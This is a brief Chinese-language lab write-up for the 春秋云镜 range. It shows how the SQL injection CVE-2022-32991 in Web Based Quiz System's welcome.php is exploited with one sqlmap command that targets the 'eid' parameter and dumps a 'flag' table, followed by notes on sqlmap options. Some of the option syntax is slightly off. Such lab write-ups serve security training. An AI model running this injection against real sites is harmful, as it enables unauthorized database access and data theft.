春秋云镜靶场 CVE-2022-32991 Web Based Quiz System SQL注入

春秋云镜靶场 CVE-2022-32991 Web Based Quiz System SQL注入

介绍

• 该CMS的welcome.php中存在SQL注入攻击。
• 利用sqlmap爆破

pyload

发现在以下界面存在sql注入：

sql注入：

python sqlmap.py -u "http://eci-2ze1h3jmxc8kr9szxe90.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" --cookie="PHPSESSID=e6fd5of1njvnf7s8s53q3mu7vn" --batch  -current-db "ctf" -table "flag" -T "flag" -C "flag" --dump

一些注意的总结：

-p                             #指定sqlmap注入的传参参数
--cookie=""                        #绕过身份验证
--random-agent="" 或 --user-agent=""    #绕过客户端验证,这俩可以用bp来获取
--batch                         #默认后续sqlmap操作都为Y